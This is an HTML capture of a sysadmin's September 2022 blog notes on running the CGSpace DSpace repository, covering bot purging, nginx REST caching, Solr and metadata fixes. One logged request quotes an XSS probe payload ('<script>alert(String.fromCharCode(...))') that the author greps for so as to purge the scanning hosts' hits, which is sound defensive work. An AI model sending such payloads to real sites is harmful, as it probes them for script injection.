+A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet
+I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change
+
+The submission works as expected
+
+
+Start debugging some region-related issues with csv-metadata-quality
+
+I created a new test file test-geography.csv with some different scenarios
+I also fixed a few bugs and improved the region-matching logic
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-09/",
+  "wordCount": "3621",
+  "datePublished": "2022-09-01T09:41:36+03:00",
+  "dateModified": "2022-09-30T17:29:50+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-09/">
+
+    <title>September, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-09/">September, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-09-01T09:41:36+03:00">Thu Sep 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-09-01">2022-09-01</h2>
+<ul>
+<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li>
+<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change
+<ul>
+<li>The submission works as expected</li>
+</ul>
+</li>
+<li>Start debugging some region-related issues with csv-metadata-quality
+<ul>
+<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li>
+<li>I also fixed a few bugs and improved the region-matching logic</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>I filed <a href="https://github.com/konstantinstadler/country_converter/issues/115">an issue for the &ldquo;South-eastern Asia&rdquo; case mismatch in country_converter</a> on GitHub</li>
+<li>Meeting with Moayad to discuss OpenRXV developments
+<ul>
+<li>He demoed his new multiple dashboards feature and I helped him rebase those changes to master so we can test them more</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-02">2022-09-02</h2>
+<ul>
+<li>I worked a bit more on exclusion and skipping logic in csv-metadata-quality
+<ul>
+<li>I also pruned and updated all the Python dependencies</li>
+<li>Then I released <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.6.0">version 0.6.0</a> now that the excludes and region matching support is working way better</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-05">2022-09-05</h2>
+<ul>
+<li>Started a harvest on AReS last night</li>
+<li>Looking over the Solr statistics from last month I see many user agents that look suspicious:
+<ul>
+<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)</li>
+<li>Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 77.0.3865.90 Safari / 537.36</li>
+<li>Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0</li>
+<li>Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre</li>
+<li>Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Edge/44.18363.8131</li>
+<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</li>
+<li>Mozilla/4.0 (compatible; MSIE 4.5; Windows 98;)</li>
+<li>curb</li>
+<li>bitdiscovery</li>
+<li>omgili/0.5 +http://omgili.com</li>
+<li>Mozilla/5.0 (compatible)</li>
+<li>Vizzit</li>
+<li>Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0</li>
+<li>Mozilla/5.0 (Android; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0</li>
+<li>Java/17-ea</li>
+<li>AdobeUxTechC4-Async/3.0.12 (win32)</li>
+<li>ZaloPC-win32-24v473</li>
+<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
+<li>Scoop.it</li>
+<li>Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0</li>
+<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</li>
+<li>ows NT 10.0; WOW64; rv: 50.0) Gecko/20100101 Firefox/50.0</li>
+<li>WebAPIClient</li>
+<li>Mozilla/5.0 Firefox/26.0</li>
+<li>Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)</li>
+</ul>
+</li>
+<li>For example, some are apparently using versions of Firefox that are over ten years old, and some are obviously trying to look like valid user agents, but making typos (<code>Mozilla / 5.0</code>)</li>
+<li>Tons of hosts making requests likt this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>GET /bitstream/handle/10568/109408/Milk%20testing%20lab%20protocol.pdf?sequence=1&amp;isAllowed=\x22&gt;&lt;script%20&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
+</span></span></code></pre></div><ul>
+<li>I got a list of hosts making requests like that so I can purge their hits:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log.<span style="color:#f92672">[</span>123<span style="color:#f92672">]</span>*.gz | grep <span style="color:#e6db74">&#39;String.fromCharCode(&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.txt 
+</span></span></code></pre></div><ul>
+<li>I purged 4,718 hits from IPs</li>
+<li>I see some new Hetzner ranges that I hadn&rsquo;t blocked yet apparently?
+<ul>
+<li>I got a <a href="https://www.ipqualityscore.com/asn-details/AS24940/hetzner-online-gmbh">list of Hetzner&rsquo;s IPs from IP Quality Score</a> then added them to the existing ones in my Ansible playbooks:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/hetzner.txt | wc -l
+</span></span><span style="display:flex;"><span>36
+</span></span><span style="display:flex;"><span>$ sort -u /tmp/hetzner-combined.txt  | wc -l
+</span></span><span style="display:flex;"><span>49
+</span></span></code></pre></div><ul>
+<li>I will add this new list to nginx&rsquo;s <code>bot-networks.conf</code> so they get throttled on scraping XMLUI and get classified as bots in Solr statistics</li>
+<li>Then I purged hits from the following user agents:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents
+</span></span><span style="display:flex;"><span>Found 374 hits from curb in statistics
+</span></span><span style="display:flex;"><span>Found 350 hits from bitdiscovery in statistics
+</span></span><span style="display:flex;"><span>Found 564 hits from omgili in statistics
+</span></span><span style="display:flex;"><span>Found 390 hits from Vizzit in statistics
+</span></span><span style="display:flex;"><span>Found 9125 hits from AdobeUxTechC4-Async in statistics
+</span></span><span style="display:flex;"><span>Found 97 hits from ZaloPC-win32-24v473 in statistics
+</span></span><span style="display:flex;"><span>Found 518 hits from nbertaupete95 in statistics
+</span></span><span style="display:flex;"><span>Found 218 hits from Scoop.it in statistics
+</span></span><span style="display:flex;"><span>Found 584 hits from WebAPIClient in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 12220
+</span></span></code></pre></div><ul>
+<li>Then I will add these user agents to the ILRI spider override in DSpace</li>
+</ul>
+<h2 id="2022-09-06">2022-09-06</h2>
+<ul>
+<li>I&rsquo;m testing dspace-statistics-api with our DSpace 7 test server
+<ul>
+<li>After setting up the env and the database the <code>python -m dspace_statistics_api.indexer</code> runs without issues</li>
+<li>While playing with Solr I tried to search for statistics from this month using <code>time:2022-09*</code> but I get this error: &ldquo;Can&rsquo;t run prefix queries on numeric fields&rdquo;</li>
+<li>I guess that the syntax in Solr changed since 4.10&hellip;</li>
+<li>This works, but is super annoying: <code>time:[2022-09-01T00:00:00Z TO 2022-09-30T23:59:59Z]</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-07">2022-09-07</h2>
+<ul>
+<li>I tested the controlled-vocabulary changes on DSpace 6 and they work fine
+<ul>
+<li>Last week I found that DSpace 7 is more strict with controlled vocabularies and requires IDs for all node values</li>
+<li>This is a pain because it means I have to re-do the IDs in each file every time I update them</li>
+<li>If I add <code>id=&quot;0000&quot;</code> to each, then I can use <a href="https://vim.fandom.com/wiki/Making_a_list_of_numbers#Substitute_with_ascending_numbers">this vim expression</a> <code>let i=0001 | g/0000/s//\=i/ | let i=i+1</code> to replace the numbers with increments starting from 1</li>
+</ul>
+</li>
+<li>Meeting with Marie Angelique, Abenet, Sarа, аnd Margarita to continue the discussion about Types from last week
+<ul>
+<li>We made progress with concrete actions and will continue next week</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-08">2022-09-08</h2>
+<ul>
+<li>I had a meeting with Nicky from UNEP to discuss issues they are having with their DSpace
+<ul>
+<li>I told her about the meeting of DSpace community people that we&rsquo;re planning at ILRI in the next few weeks</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-09">2022-09-09</h2>
+<ul>
+<li>Add some value mappings to AReS because I see a lot of incorrect regions and countries</li>
+<li>I also found some values that were blank in CGSpace so I deleted them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>BEGIN
+</span></span><span style="display:flex;"><span>dspace=# DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value=&#39;&#39;;
+</span></span><span style="display:flex;"><span>DELETE 70
+</span></span><span style="display:flex;"><span>dspace=# COMMIT;
+</span></span><span style="display:flex;"><span>COMMIT
+</span></span></code></pre></div><ul>
+<li>Start a full Discovery index on CGSpace to catch these changes in the Discovery</li>
+</ul>
+<h2 id="2022-09-11">2022-09-11</h2>
+<ul>
+<li>Today is Sunday and I see the load on the server is high
+<ul>
+<li>Google and a bunch of other bots have been blocked on XMLUI for the past two weeks so it&rsquo;s not from them!</li>
+<li>Looking at the top IPs this morning:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log.1 | grep <span style="color:#e6db74">&#39;11/Sep/2022&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">40</span>
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    165 64.233.172.79
+</span></span><span style="display:flex;"><span>    166 87.250.224.34
+</span></span><span style="display:flex;"><span>    200 69.162.124.231
+</span></span><span style="display:flex;"><span>    202 216.244.66.198
+</span></span><span style="display:flex;"><span>    385 207.46.13.149
+</span></span><span style="display:flex;"><span>    398 207.46.13.147
+</span></span><span style="display:flex;"><span>    421 66.249.64.185
+</span></span><span style="display:flex;"><span>    422 157.55.39.81
+</span></span><span style="display:flex;"><span>    442 2a01:4f8:1c17:5550::1
+</span></span><span style="display:flex;"><span>    451 64.124.8.36
+</span></span><span style="display:flex;"><span>    578 137.184.159.211
+</span></span><span style="display:flex;"><span>    597 136.243.228.195
+</span></span><span style="display:flex;"><span>   1185 66.249.64.183
+</span></span><span style="display:flex;"><span>   1201 157.55.39.80
+</span></span><span style="display:flex;"><span>   3135 80.248.237.167
+</span></span><span style="display:flex;"><span>   4794 54.195.118.125
+</span></span><span style="display:flex;"><span>   5486 45.5.186.2
+</span></span><span style="display:flex;"><span>   6322 2a01:7e00::f03c:91ff:fe9a:3a37
+</span></span><span style="display:flex;"><span>   9556 66.249.64.181
+</span></span></code></pre></div><ul>
+<li>The top is still Google, but all the requests are HTTP 503 because I classified them as bots for XMLUI at least</li>
+<li>Then there&rsquo;s 80.248.237.167, which is using a normal user agent and scraping Discovery
+<ul>
+<li>That IP is on Internet Vikings aka Internetbolaget and we are already marking that subnet as &lsquo;bot&rsquo; for XMLUI so most of these requests are HTTP 503</li>
+</ul>
+</li>
+<li>On another note, I&rsquo;m curious to explore enabling caching of certain REST API responses
+<ul>
+<li>For example, where the use is for harvesting rather than actual clients getting bitstreams or thumbnails, it seems there might be a benefit to speeding these up for subsequent requestors:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log | grep -v retrieve | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">10</span>
+</span></span><span style="display:flex;"><span>      4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/bitstreams
+</span></span><span style="display:flex;"><span>      4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/metadata
+</span></span><span style="display:flex;"><span>      4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/bitstreams
+</span></span><span style="display:flex;"><span>      4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/metadata
+</span></span><span style="display:flex;"><span>      5 /rest/handle/10568/110310?expand=all
+</span></span><span style="display:flex;"><span>      5 /rest/handle/10568/89980?expand=all
+</span></span><span style="display:flex;"><span>      5 /rest/handle/10568/97614?expand=all
+</span></span><span style="display:flex;"><span>      6 /rest/handle/10568/107086?expand=all
+</span></span><span style="display:flex;"><span>      6 /rest/handle/10568/108503?expand=all
+</span></span><span style="display:flex;"><span>      6 /rest/handle/10568/98424?expand=all
+</span></span></code></pre></div><ul>
+<li>I specifically have to not cache things like requests for bitstreams because those are from actual users and we need to keep the real requests so we get the statistics hit
+<ul>
+<li>Will be interesting to check the results above as the day goes on (now 10AM)</li>
+<li>To estimate the potential savings from caching I will check how many non-bitstream requests are made versus how many are made more than once (updated the next morning using yesterday&rsquo;s log):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort -u | wc -l
+</span></span><span style="display:flex;"><span>33733
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>5637
+</span></span></code></pre></div><ul>
+<li>In the afternoon I started a harvest on AReS (which should affect the numbers above also)</li>
+<li>I enabled an nginx proxy cache on DSpace Test for this location regex: <code>location ~ /rest/(handle|items|collections|communities)/.+</code></li>
+</ul>
+<h2 id="2022-09-12">2022-09-12</h2>
+<ul>
+<li>I am testing harvesting DSpace Test via AReS with the nginx proxy cache enabled
+<ul>
+<li>I had to tune the regular expression in nginx a bit because the REST requests OpenRXV uses weren&rsquo;t matching</li>
+<li>Now I&rsquo;m trying this one: <code>/rest/(handle|items|collections|communities)/?</code></li>
+<li>Testing in <a href="https://regex101.com/r/vPz11y/1">regex101.com</a> with this test string:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>/rest/handle/10568/27611
+/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&amp;limit=10&amp;offset=36270
+/rest/handle/10568/110310?expand=all
+/rest/rest/bitstreams/28926633-c7c2-49c2-afa8-6d81cadc2316/retrieve
+/rest/bitstreams/15412/retrieve
+/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/metadata
+/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/bitstreams
+/rest/collections/edea23c0-0ebd-4525-90b0-0b401f997704/items
+/rest/items/14507941-aff2-4d57-90bd-03a0733ad859/metadata
+/rest/communities/b38ea726-475f-4247-a961-0d0b76e67f85/collections
+/rest/collections/e994c450-6ff7-41c6-98df-51e5c424049e/items?limit=10000
+</code></pre><ul>
+<li>I estimate that it will take about 1GB of cache to harvest 100,000 items from CGSpace with OpenRXV (10,000 pages)</li>
+<li>Basically all but 4 and 5 (bitstreams) should match</li>
+<li>Upload 682 OICRs from MARLO to CGSpace
+<ul>
+<li>We had tested these on DSpace Test last month along with the MELIAs, Policies, and Innovations, but we decided to upload the OICRs first so that other things can link against them as related items</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-14">2022-09-14</h2>
+<ul>
+<li>Meeting with Peter, Abenet, Indira, and Michael about CGSpace rollout plan for the Initiatives</li>
+</ul>
+<h2 id="2022-09-16">2022-09-16</h2>
+<ul>
+<li>Meeting with Marie-Angeqlique, Abenet, Margarita, and Sara about types for CG Core
+<ul>
+<li>We are about halfway through the list of types now, with concrete actions for CG Core and CGSpace</li>
+<li>We will meet next in two weeks to hopefully finalize the list, then we can move on to definitions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-18">2022-09-18</h2>
+<ul>
+<li>Deploy the <code>org.apache.cocoon.uploads.autosave=false</code> change on CGSpace</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-09-19">2022-09-19</h2>
+<ul>
+<li>Deploy the nginx proxy cache for /rest requests on CGSpace
+<ul>
+<li>I had tested this last week on DSpace Test</li>
+<li>By my counts on CGSpace yesterday (Sunday, a busy day for the REST API), we had 5,654 URLs that were requested more than twice, and it tails off after that towards two, three, four, etc:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>5654
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 == 2&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>4710
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 == 3&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>814
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 == 4&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>86
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $7}&#39;</span> /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk <span style="color:#e6db74">&#39;$1 == 5&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>39
+</span></span></code></pre></div><ul>
+<li>For now I guess requests that were done two or three times by different clients will be cached and that&rsquo;s a win, and I expect more and more REST API activity soon when initiatives and One CGIAR stuff picks up</li>
+</ul>
+<h2 id="2022-09-20">2022-09-20</h2>
+<ul>
+<li>I checked the status of the nginx REST API cache on CGSpace and it was stuck at 7,083 items for hours:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># find /var/cache/nginx/rest_cache/ -type f | wc -l
+</span></span><span style="display:flex;"><span>7083
+</span></span></code></pre></div><ul>
+<li>The proxy cache key zone is currently 1m, which can store ~8,000 keys, so that could be what we&rsquo;re running into
+<ul>
+<li>I increased it to 2m and will keep monitoring it</li>
+</ul>
+</li>
+<li>CIP webmaster contacted me to say they are having problems harvesting CGSpace from their WordPress
+<ul>
+<li>I am not sure if there are issues due to the REST API caching I enabled&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-21">2022-09-21</h2>
+<ul>
+<li>Planning the Nairobi DSpace Users meeting with Abenet</li>
+<li>Planning to have a call about MEL submitting to CGSpace on Monday with Mohammed Salem
+<ul>
+<li>I created two collections on DSpace Test: one with a workflow, and one without</li>
+<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API, so I added it to the admin group of each collection</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-22">2022-09-22</h2>
+<ul>
+<li>Nairobi DSpace users meeting at ILRI</li>
+<li>I found a few users that didn&rsquo;t have ORCID iDs and were missing tags on CGSpace so I tagged them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Alonso, Silvia&#34;,&#34;Silvia Alonso: 0000-0002-0565-536X&#34;
+</span></span><span style="display:flex;"><span>&#34;Goopy, John P.&#34;,&#34;John Goopy: 0000-0001-7177-1310&#34;
+</span></span><span style="display:flex;"><span>&#34;Korir, Daniel&#34;,&#34;Daniel Korir: 0000-0002-1356-8039&#34;
+</span></span><span style="display:flex;"><span>&#34;Leitner, Sonja&#34;,&#34;Sonja Leitner: 0000-0002-1276-8071&#34;
+</span></span><span style="display:flex;"><span>&#34;Fèvre, Eric M.&#34;,&#34;Eric M. Fèvre: 0000-0001-8931-4986&#34;
+</span></span><span style="display:flex;"><span>&#34;Galiè, Alessandra&#34;,&#34;Alessandra Galie: 0000-0001-9868-7733&#34;
+</span></span><span style="display:flex;"><span>&#34;Baltenweck, Isabelle&#34;,&#34;Isabelle Baltenweck: 0000-0002-4147-5921&#34;
+</span></span><span style="display:flex;"><span>&#34;Robinson, Timothy P.&#34;,&#34;Timothy Robinson: 0000-0002-4266-963X&#34;
+</span></span><span style="display:flex;"><span>&#34;Lannerstad, Mats&#34;,&#34;Mats Lannerstad: 0000-0002-5116-3198&#34;
+</span></span><span style="display:flex;"><span>&#34;Graham, Michael&#34;,&#34;Michael Graham: 0000-0002-1189-8640&#34;
+</span></span><span style="display:flex;"><span>&#34;Merbold, Lutz&#34;,&#34;Lutz Merbold: 0000-0003-4974-170X&#34;
+</span></span><span style="display:flex;"><span>&#34;Rufino, Mariana C.&#34;,&#34;Mariana Rufino: 0000-0003-4293-3290&#34;
+</span></span><span style="display:flex;"><span>&#34;Wilkes, Andreas&#34;,&#34;Andreas Wilkes: 0000-0001-7546-991X&#34;
+</span></span><span style="display:flex;"><span>&#34;van der Weerden, T.&#34;,&#34;Tony van der Weerden: 0000-0002-6999-2584&#34;
+</span></span><span style="display:flex;"><span>&#34;Vermeulen, S.&#34;,&#34;Sonja Vermeulen: 0000-0001-6242-9513&#34;
+</span></span><span style="display:flex;"><span>&#34;Vermeulen, Sonja&#34;,&#34;Sonja Vermeulen: 0000-0001-6242-9513&#34;
+</span></span><span style="display:flex;"><span>&#34;Vermeulen, Sonja J.&#34;,&#34;Sonja Vermeulen: 0000-0001-6242-9513&#34;
+</span></span><span style="display:flex;"><span>&#34;Hung Nguyen-Viet&#34;,&#34;Hung Nguyen-Viet: 0000-0003-1549-2733&#34;
+</span></span><span style="display:flex;"><span>&#34;Herrero, Mario T.&#34;,&#34;Mario Herrero: 0000-0002-7741-5090&#34;
+</span></span><span style="display:flex;"><span>&#34;Thornton, Philip K.&#34;,&#34;Philip Thornton: 0000-0002-1854-0182&#34;
+</span></span><span style="display:flex;"><span>&#34;Duncan, Alan J.&#34;,&#34;Alan Duncan: 0000-0002-3954-3067&#34;
+</span></span><span style="display:flex;"><span>&#34;Lukuyu, Ben A.&#34;,&#34;Ben Lukuyu: 0000-0002-9374-3553&#34;
+</span></span><span style="display:flex;"><span>&#34;Lindahl, Johanna F.&#34;,&#34;Johanna Lindahl: 0000-0002-1175-0398&#34;
+</span></span><span style="display:flex;"><span>&#34;Okeyo Mwai, Ally&#34;,&#34;Ally Okeyo Mwai: 0000-0003-2379-7801&#34;
+</span></span><span style="display:flex;"><span>&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
+</span></span><span style="display:flex;"><span>&#34;Omore, Amos O.&#34;,&#34;Amos Omore: 0000-0001-9213-9891&#34;
+</span></span><span style="display:flex;"><span>&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
+</span></span><span style="display:flex;"><span>&#34;Staal, Steven J.&#34;,&#34;Steven Staal: 0000-0002-1244-1773&#34;
+</span></span><span style="display:flex;"><span>&#34;Hanotte, Olivier H.&#34;,&#34;Olivier Hanotte: 0000-0002-2877-4767&#34;
+</span></span><span style="display:flex;"><span>&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
+</span></span><span style="display:flex;"><span>&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
+</span></span><span style="display:flex;"><span>&#34;Gebremedhin, Berhanu&#34;,&#34;Berhanu Gebremedhin: 0000-0002-3168-2783&#34;
+</span></span><span style="display:flex;"><span>&#34;Ouma, Emily A.&#34;,&#34;Emily Ouma: 0000-0002-3123-1376&#34;
+</span></span><span style="display:flex;"><span>&#34;Roesel, Kristina&#34;,&#34;Kristina Roesel: 0000-0002-2553-1129&#34;
+</span></span><span style="display:flex;"><span>&#34;Bishop, Richard P.&#34;,&#34;Richard Bishop: 0000-0002-3720-9970&#34;
+</span></span><span style="display:flex;"><span>&#34;Lapar, Ma. Lucila&#34;,&#34;Ma. Lucila Lapar: 0000-0002-4214-9845&#34;
+</span></span><span style="display:flex;"><span>&#34;Rich, Karl M.&#34;,&#34;Karl Rich: 0000-0002-5581-9553&#34;
+</span></span><span style="display:flex;"><span>&#34;Hoekstra, Dirk&#34;,&#34;Dirk Hoekstra: 0000-0002-6111-6627&#34;
+</span></span><span style="display:flex;"><span>&#34;Nene, Vishvanath&#34;,&#34;Vishvanath Nene: 0000-0001-7066-4169&#34;
+</span></span><span style="display:flex;"><span>&#34;Patel, S.P.&#34;,&#34;Sonal Henson: 0000-0002-2002-5462&#34;
+</span></span><span style="display:flex;"><span>&#34;Hanson, Jean&#34;,&#34;Jean Hanson: 0000-0002-3648-2641&#34;
